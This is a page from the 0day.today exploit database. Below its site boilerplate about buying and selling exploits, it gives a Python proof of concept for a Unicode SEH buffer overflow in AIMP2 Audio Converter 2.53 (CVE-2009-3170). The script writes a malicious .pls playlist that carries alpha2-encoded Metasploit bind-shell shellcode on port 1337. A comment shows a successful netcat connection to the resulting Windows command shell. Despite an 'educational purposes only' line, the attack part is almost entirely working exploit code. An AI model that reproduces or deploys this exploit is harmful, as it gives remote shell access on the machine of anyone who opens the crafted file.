0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF
=================================================================== AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF =================================================================== # Title: AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF # CVE-ID: (CVE-2009-3170) # OSVDB-ID: () # Author: mr_me # Published: 2009-11-21 # Verified: yes view source print? #!/usr/bin/python # # ###################################################################### # # *** For educational purposes only *** # You have been warned # # My original crash breakdown: # # EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~ # ECX 00000273 # EDX 00000C4C # EBX 00000000 # ESP 0012DCA8 # EBP 0012DD64 # ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~ # EDI 00130000 ASCII "Actx " # EIP 004530C6 AIMP2.004530C6 # # And then when we pass the exemption handler to overwrite EIP... # # EIP 00410041 # # The Info: # # I knew this exploit was always possible, but I failed to have the knowledge # and experiance to complete it. Many thanks goes to corelanc0d3r for # demonstrating this unicode concept on his blog. I downloaded his PoC however it # did not work on my VM so I remade it with some fun shellcode :) # # Visit corelanc0d3r's blog: http://www.corelan.be:8800/ # # root@home:/home/mrme# nc -v 192.168.2.6 1337 # 192.168.2.6: inverse host lookup failed: Unknown server error : Connection timed out # (UNKNOWN) [192.168.2.6] 1337 (?) open # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\AIMP2\Langs> # # Metasploit bind shell on port 1337 # Encoded using Skylined's alpha2 encoder shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA" "IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1" "111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK" "2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9" "04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL" "PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV" "M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH" "XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ" "6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO" "8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP" "PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ" "0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ" "XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU" "8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K" "O8VKO8PKZA") header = ("[playlist]\nNumberOfEntries=3\n\n"); header += ("File1="); crash = ('\x41' * 1985) # offset before shellcode crash += shellcode # add the shellcode crash += ('\41' * (4033-len(crash))) # remaining offset (1st block) crash += ('\x41\x6d') # inc ecx + add byte ptr [ebp],ch crash += ('\x0e\x45') # seh handler (p/p/r in aimp2.dll) # We needed an address that is located at or close to our shellcode # We find one on the forth address from the stack align = '\x58' # pop eax align += '\x6d' align += '\x58' # pop eax align += '\x6d' align += '\x58' # pop eax align += '\x6d' align += '\x58' # pop eax align += '\x6d' # Here we adjust the value of eax to the address of where our shellcode # is.. (in the original buffer) align += '\x05\x02\x22' # add eax,22000200 align += '\x6d' align += '\x2d\x09\x11' # sub eax,11000900 align += '\x6d' align += '\x2d\x09\x11' # sub eax,11000900 align += '\x6d' # Eax now equals 0x0012EDA0 which is the location of our shellcode. We push # eax onto the stack and jump to it so its executed jump ='\x50' # push eax jump += '\x6d' jump += '\xc3' # jmp eax finish = ('\x42' * (963-len(align)-len(jump))) buffer = header + crash + align + jump + finish + '\n' file=open('mr_me_owns_aimp.pls','w') file.write(buffer) file.close() print "[+] mr_me_owns_aimp.pls file created successfully" # 0day.today [2024-07-07] #